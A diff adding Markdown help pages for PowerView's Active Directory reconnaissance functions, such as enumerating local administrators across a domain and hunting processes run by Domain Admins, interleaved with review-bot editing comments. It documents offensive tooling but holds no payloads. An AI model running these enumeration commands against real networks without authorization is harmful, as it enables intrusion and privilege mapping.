+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+ConvertFrom-UACValue -Value 66176
+```
+
+Name Value
+---- -----
+ENCRYPTED_TEXT_PWD_ALLOWED 128
+NORMAL_ACCOUNT 512
+DONT_EXPIRE_PASSWORD 65536
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainUser harmj0y | ConvertFrom-UACValue
+```
+
+Name Value
+---- -----
+NORMAL_ACCOUNT 512
+DONT_EXPIRE_PASSWORD 65536
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainUser harmj0y | ConvertFrom-UACValue -ShowAll
+```
+
+Name Value
+---- -----
+SCRIPT 1
+ACCOUNTDISABLE 2
+HOMEDIR_REQUIRED 8
+LOCKOUT 16
+PASSWD_NOTREQD 32
+PASSWD_CANT_CHANGE 64
+ENCRYPTED_TEXT_PWD_ALLOWED 128
+TEMP_DUPLICATE_ACCOUNT 256
+NORMAL_ACCOUNT 512+
+INTERDOMAIN_TRUST_ACCOUNT 2048
+WORKSTATION_TRUST_ACCOUNT 4096
+SERVER_TRUST_ACCOUNT 8192
+DONT_EXPIRE_PASSWORD 65536+
+MNS_LOGON_ACCOUNT 131072
+SMARTCARD_REQUIRED 262144
+TRUSTED_FOR_DELEGATION 524288
+NOT_DELEGATED 1048576
+USE_DES_KEY_ONLY 2097152
+DONT_REQ_PREAUTH 4194304
+PASSWORD_EXPIRED 8388608
+TRUSTED_TO_AUTH_FOR_DELEGATION 16777216
+PARTIAL_SECRETS_ACCOUNT 67108864
+
+## PARAMETERS
+
+### -Value
+Specifies the integer UAC value to convert.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases: UAC, useraccountcontrol
+
+Required: True
+Position: 1
+Default value: 0
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -ShowAll
+Switch.
+Signals ConvertFrom-UACValue to display all UAC values, with a + indicating the value is currently set.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### Int
+
+Accepts an integer representing a UAC binary blob.
+
+## OUTPUTS
+
+### System.Collections.Specialized.OrderedDictionary
+
+An ordered dictionary with the converted UAC fields.
+
+## NOTES
+
+## RELATED LINKS
+
+[https://support.microsoft.com/en-us/kb/305144](https://support.microsoft.com/en-us/kb/305144)
+
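Review bot: the DESCRIPTION has "covert" for "convert" and a stray hyphen in "displayed- the -ShowAll switch". INPUTS is headed "### Int" while the parameter is typed Int32; use the same type name in both places. The -Value metadata shows `Default value: 0` for a parameter that is `Required: True`, a platyPS artifact worth clearing so readers do not take 0 for a meaningful default. The examples are internally consistent: EXAMPLE 1's 128 + 512 + 65536 = 66176, and EXAMPLE 3's `512+` and `65536+` markers match the -ShowAll description.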
diff --git a/docs/Recon/ConvertTo-SID.md b/docs/Recon/ConvertTo-SID.md new file mode 100755 index 0000000..71e9cea --- /dev/null +++ b/docs/Recon/ConvertTo-SID.md @@ -0,0 +1,120 @@ +# ConvertTo-SID
+
+## SYNOPSIS
+Converts a given user/group name to a security identifier (SID).
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Convert-ADName, Get-DomainObject, Get-Domain
+
+## SYNTAX
+
+```
+ConvertTo-SID [-ObjectName] <String[]> [[-Domain] <String>] [[-Server] <String>] [[-Credential] <PSCredential>]
+```
+
+## DESCRIPTION
+Converts a "DOMAIN\username" syntax to a security identifier (SID)
+using System.Security.Principal.NTAccount's translate function.
+If alternate
+credentials are supplied, then Get-ADObject is used to try to map the name
+to a security identifier.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+ConvertTo-SID 'DEV\dfm'
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+'DEV\dfm','DEV\krbtgt' | ConvertTo-SID
+```
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+'TESTLAB\dfm' | ConvertTo-SID -Credential $Cred
+
+## PARAMETERS
+
+### -ObjectName
+The user/group name to convert, can be 'user' or 'DOMAIN\user' format.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: Name, Identity
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the translation, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to for the translation.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: 3
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+Specifies an alternate credential to use for the translation.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 4
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### String
+
+Accepts one or more username specification strings on the pipeline.
+
+## OUTPUTS
+
+### String
+
+A string representing the SID of the translated name.
+
+## NOTES
+
+## RELATED LINKS
+
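Review bot: EXAMPLE 3 of ConvertTo-SID.md is broken by the fence placement: only `$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force` sits inside the code block, while `$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)` and `'TESTLAB\dfm' | ConvertTo-SID -Credential $Cred` fall outside it and render as prose. Move the closing fence below the third line so the whole example is one code block; the same split appears in every multi-line example in this commit, so it is worth fixing in the generator step rather than file by file. Separately, the DESCRIPTION says the alternate-credential path uses Get-ADObject, which is the ActiveDirectory module cmdlet; if the function actually uses a PowerView lookup, the description should name that instead, and it should also say how the documented -Domain and -Server parameters affect the translation, since they are listed under PARAMETERS but never mentioned in the description.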
diff --git a/docs/Recon/Export-PowerViewCSV.md b/docs/Recon/Export-PowerViewCSV.md new file mode 100755 index 0000000..1597249 --- /dev/null +++ b/docs/Recon/Export-PowerViewCSV.md @@ -0,0 +1,117 @@ +# Export-PowerViewCSV
+
+## SYNOPSIS
+Converts objects into a series of comma-separated (CSV) strings and saves the
+strings in a CSV file in a thread-safe manner.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Export-PowerViewCSV -InputObject <PSObject[]> [-Path] <String> [[-Delimiter] <Char>] [-Append]
+```
+
+## DESCRIPTION
+This helper exports an -InputObject to a .csv in a thread-safe manner
+using a mutex.
+This is so the various multi-threaded functions in
+PowerView has a thread-safe way to export output to the same file.
+Uses .NET IO.FileStream/IO.StreamWriter objects for speed.
+
+Originally based on Dmitry Sotnikov's Export-CSV code: http://poshcode.org/1590
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainUser | Export-PowerViewCSV -Path "users.csv"
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainUser | Export-PowerViewCSV -Path "users.csv" -Append -Delimiter '|'
+```
+
+## PARAMETERS
+
+### -InputObject
+Specifies the objects to export as CSV strings.
+
+```yaml
+Type: PSObject[]
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Path
+Specifies the path to the CSV output file.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Delimiter
+Specifies a delimiter to separate the property values.
+The default is a comma (,)
+
+```yaml
+Type: Char
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 3
+Default value: ,
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Append
+Indicates that this cmdlet adds the CSV output to the end of the specified file.
+Without this parameter, Export-PowerViewCSV replaces the file contents without warning.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### PSObject
+
+Accepts one or more PSObjects on the pipeline.
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
+[http://poshcode.org/1590
+http://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/](http://poshcode.org/1590
+http://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/)
+
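Review bot: the RELATED LINKS block at the end of Export-PowerViewCSV.md is a single malformed link spanning three lines, from `[http://poshcode.org/1590` to `http://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/)`, with both URLs stuffed into both the link text and the target; split it into two separate links, one per line, e.g. `[http://poshcode.org/1590](http://poshcode.org/1590)`. In DESCRIPTION, `PowerView has a thread-safe way to export output` should read `have`, since the subject is "the various multi-threaded functions". The OUTPUTS section is empty; if the intent is that the function only writes to disk and emits nothing to the pipeline, a one-line "None" under OUTPUTS makes that explicit instead of looking like a generation gap.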
diff --git a/docs/Recon/Find-DomainLocalGroupMember.md b/docs/Recon/Find-DomainLocalGroupMember.md new file mode 100755 index 0000000..be4055f --- /dev/null +++ b/docs/Recon/Find-DomainLocalGroupMember.md @@ -0,0 +1,351 @@ +# Find-DomainLocalGroupMember
+
+## SYNOPSIS
+Enumerates the members of specified local group (default administrators)
+for all the targeted machines on the current (or specified) domain.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetLocalGroupMember, New-ThreadedFunction
+
+## SYNTAX
+
+```
+Find-DomainLocalGroupMember [[-ComputerName] <String[]>] [-ComputerDomain <String>]
+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>]
+ [-ComputerServicePack <String>] [-ComputerSiteName <String>] [-GroupName <String>] [-Method <String>]
+ [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]
+ [-Credential <PSCredential>] [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]
+```
+
+## DESCRIPTION
+This function enumerates all machines on the current (or specified) domain
+using Get-DomainComputer, and enumerates the members of the specified local
+group (default of Administrators) for each machine using Get-NetLocalGroupMember.
+By default, the API method is used, but this can be modified with '-Method winnt'
+to use the WinNT service provider.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-DomainLocalGroupMember
+```
+
+Enumerates the local group memberships for all reachable machines in the current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Find-DomainLocalGroupMember -Domain dev.testlab.local
+```
+
+Enumerates the local group memberships for all reachable machines the dev.testlab.local domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-DomainLocalGroupMember -Domain testlab.local -Credential $Cred
+
+Enumerates the local group memberships for all reachable machines the dev.testlab.local
+domain using the alternate credentials.
+
+## PARAMETERS
+
+### -ComputerName
+Specifies an array of one or more hosts to enumerate, passable on the pipeline.
+If -ComputerName is not passed, the default behavior is to enumerate all machines
+in the domain returned by Get-DomainComputer.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DNSHostName
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -ComputerDomain
+Specifies the domain to query for computers, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerLDAPFilter
+Specifies an LDAP query string that is used to search for computer objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSearchBase
+Specifies the LDAP source to search through for computers,
+e.g.
+"LDAP://OU=secret,DC=testlab,DC=local".
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerOperatingSystem
+Search computers with a specific operating system, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: OperatingSystem
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerServicePack
+Search computers with a specific service pack, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ServicePack
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSiteName
+Search computers in the specific AD Site name, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: SiteName
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -GroupName
+The local group name to query for users.
+If not given, it defaults to "Administrators".
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Administrators
+Accept pipeline input: True (ByPropertyName)
+Accept wildcard characters: False
+```
+
+### -Method
+The collection method to use, defaults to 'API', also accepts 'WinNT'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: CollectionMethod
+
+Required: False
+Position: Named
+Default value: API
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain and target systems.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Delay
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Jitter
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
+
+```yaml
+Type: Double
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0.3
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Threads
+The number of threads to use for user searching, defaults to 20.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 20
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.LocalGroupMember.API
+
+Custom PSObject with translated group property fields from API results.
+
+PowerView.LocalGroupMember.WinNT
+
+Custom PSObject with translated group property fields from WinNT results.
+
+## NOTES
+
+## RELATED LINKS
+
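Review bot: EXAMPLE 2 and EXAMPLE 3 of Find-DomainLocalGroupMember.md call `Find-DomainLocalGroupMember -Domain dev.testlab.local` and `Find-DomainLocalGroupMember -Domain testlab.local -Credential $Cred`, but neither the SYNTAX line nor the PARAMETERS section defines a `-Domain` parameter; the only domain parameter is `-ComputerDomain`, and its `Aliases:` entry is empty (compare Find-DomainShare.md in this same commit, where -ComputerDomain carries `Aliases: Domain`). Either add the Domain alias to the parameter or rewrite the examples to use -ComputerDomain, otherwise they fail as written. Smaller points in the same file: EXAMPLE 3's fence closes after the first line, leaving the `$Cred = ...` and `Find-DomainLocalGroupMember ...` lines outside the code block; its description says `dev.testlab.local` while the command targets testlab.local, and the EXAMPLE 2 and 3 descriptions both drop the word "in" ("machines the dev.testlab.local domain"); under OUTPUTS, `PowerView.LocalGroupMember.WinNT` lacks the `###` heading that `PowerView.LocalGroupMember.API` has; -Threads describes "user searching" although this function enumerates local group members; and -ServerTimeLimit says "Default of 120 seconds" while its yaml block reports `Default value: 0`.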
diff --git a/docs/Recon/Find-DomainObjectPropertyOutlier.md b/docs/Recon/Find-DomainObjectPropertyOutlier.md new file mode 100755 index 0000000..280e8ef --- /dev/null +++ b/docs/Recon/Find-DomainObjectPropertyOutlier.md @@ -0,0 +1,261 @@ +# Find-DomainObjectPropertyOutlier
+
+## SYNOPSIS
+Finds user/group/computer objects in AD that have 'outlier' properties set.
+
+Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: Get-Domain, Get-DomainUser, Get-DomainGroup, Get-DomainComputer, Get-ForestSchemaClass
+
+## SYNTAX
+
+### ClassName (Default)
+```
+Find-DomainObjectPropertyOutlier [-ClassName] <String> [-ReferencePropertySet <String[]>] [-Domain <String>]
+ [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+### ReferenceObject
+```
+Find-DomainObjectPropertyOutlier [-ReferencePropertySet <String[]>] -ReferenceObject <PSObject>
+ [-Domain <String>] [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Enumerates the schema for the specified -ClassName (if passed) by using Get-ForestSchemaClass.
+If a -ReferenceObject is passed, the class is extracted from the passed object.
+A 'reference' set of property names is then calculated, either from a standard set preserved
+for user/group/computers, or from the array of names passed to -ReferencePropertySet, or
+from the property names of the passed -ReferenceObject.
+These property names are substracted
+from the master schema propertyu name list to retrieve a set of 'non-standard' properties.
+Every user/group/computer object (depending on determined class) are enumerated, and for each
+object, if the object has a 'non-standard' property set, the object samAccountName, property
+name, and property value are output to the pipeline.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-DomainObjectPropertyOutlier -User
+```
+
+Enumerates users in the current domain with 'outlier' properties filled in.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Find-DomainObjectPropertyOutlier -Group -Domain external.local
+```
+
+Enumerates groups in the external.local forest/domain with 'outlier' properties filled in.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier
+```
+
+Enumerates computers in the current domain with 'outlier' properties filled in.
+
+## PARAMETERS
+
+### -ClassName
+Specifies the AD object class to find property outliers for, 'user', 'group', or 'computer'.
+If -ReferenceObject is specified, this will be automatically extracted, if possible.
+
+```yaml
+Type: String
+Parameter Sets: ClassName
+Aliases: Class
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ReferencePropertySet
+Specifies an array of property names to diff against the class schema.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ReferenceObject
+Specicifes the PowerView user/group/computer object to extract property names
+from to use as the reference set.
+
+```yaml
+Type: PSObject
+Parameter Sets: ReferenceObject
+Aliases:
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.PropertyOutlier
+
+Custom PSObject with translated object property outliers.
+
+## NOTES
+
+## RELATED LINKS
+
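Review bot: EXAMPLE 1 and EXAMPLE 2 of Find-DomainObjectPropertyOutlier.md use switches that do not exist: `Find-DomainObjectPropertyOutlier -User` and `Find-DomainObjectPropertyOutlier -Group -Domain external.local`, whereas both SYNTAX blocks and the PARAMETERS section only offer `[-ClassName] <String>` taking 'user', 'group' or 'computer'. Rewrite them as `Find-DomainObjectPropertyOutlier -ClassName user` and `Find-DomainObjectPropertyOutlier -ClassName group -Domain external.local`; as written they produce a parameter-binding error. The DESCRIPTION also carries spelling and grammar slips worth fixing while here: "substracted" and "propertyu name list" in the sentence about the master schema, "Every user/group/computer object ... are enumerated" should be "is enumerated", and the -ReferenceObject description opens with "Specicifes". As in the other files, -ServerTimeLimit's text says 120 seconds while the yaml shows `Default value: 0`.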
diff --git a/docs/Recon/Find-DomainProcess.md b/docs/Recon/Find-DomainProcess.md new file mode 100755 index 0000000..89dc568 --- /dev/null +++ b/docs/Recon/Find-DomainProcess.md @@ -0,0 +1,517 @@ +# Find-DomainProcess
+
+## SYNOPSIS
+Searches for processes on the domain using WMI, returning processes
+that match a particular user specification or process name.
+
+Thanks to @paulbrandau for the approach idea.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainComputer, Get-DomainUser, Get-DomainGroupMember, Get-WMIProcess, New-ThreadedFunction
+
+## SYNTAX
+
+### None (Default)
+```
+Find-DomainProcess [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]
+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]
+ [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]
+ [-UserGroupIdentity <String[]>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>] [-StopOnSuccess] [-Delay <Int32>]
+ [-Jitter <Double>] [-Threads <Int32>]
+```
+
+### TargetProcess
+```
+Find-DomainProcess [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]
+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]
+ [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]
+ [-ProcessName <String[]>] [-UserGroupIdentity <String[]>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+ [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]
+```
+
+### UserIdentity
+```
+Find-DomainProcess [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]
+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]
+ [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]
+ [-UserIdentity <String[]>] [-UserGroupIdentity <String[]>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+ [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]
+```
+
+### TargetUser
+```
+Find-DomainProcess [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]
+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]
+ [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]
+ [-UserIdentity <String[]>] [-UserDomain <String>] [-UserLDAPFilter <String>] [-UserSearchBase <String>]
+ [-UserGroupIdentity <String[]>] [-UserAdminCount] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+ [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]
+```
+
+## DESCRIPTION
+This function enumerates all machines on the current (or specified) domain
+using Get-DomainComputer, and queries the domain for users of a specified group
+(default 'Domain Admins') with Get-DomainGroupMember.
+Then for each server the
+function enumerates any current processes running with Get-WMIProcess,
+searching for processes running under any target user contexts or with the
+specified -ProcessName.
+If -Credential is passed, it is passed through to
+the underlying WMI commands used to enumerate the remote machines.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-DomainProcess
+```
+
+Searches for processes run by 'Domain Admins' by enumerating every computer in the domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Find-DomainProcess -UserAdminCount -ComputerOperatingSystem 'Windows 7*' -Domain dev.testlab.local
+```
+
+Enumerates Windows 7 computers in dev.testlab.local and returns any processes being run by
+privileged users in dev.testlab.local.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Find-DomainProcess -ProcessName putty.exe
+```
+
+Searchings for instances of putty.exe running on the current domain.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-DomainProcess -Domain testlab.local -Credential $Cred
+
+Searches processes being run by 'domain admins' in the testlab.local using the specified alternate credentials.
+
+## PARAMETERS
+
+### -ComputerName
+Specifies an array of one or more hosts to enumerate, passable on the pipeline.
+If -ComputerName is not passed, the default behavior is to enumerate all machines
+in the domain returned by Get-DomainComputer.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DNSHostName
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to query for computers AND users, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerDomain
+Specifies the domain to query for computers, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerLDAPFilter
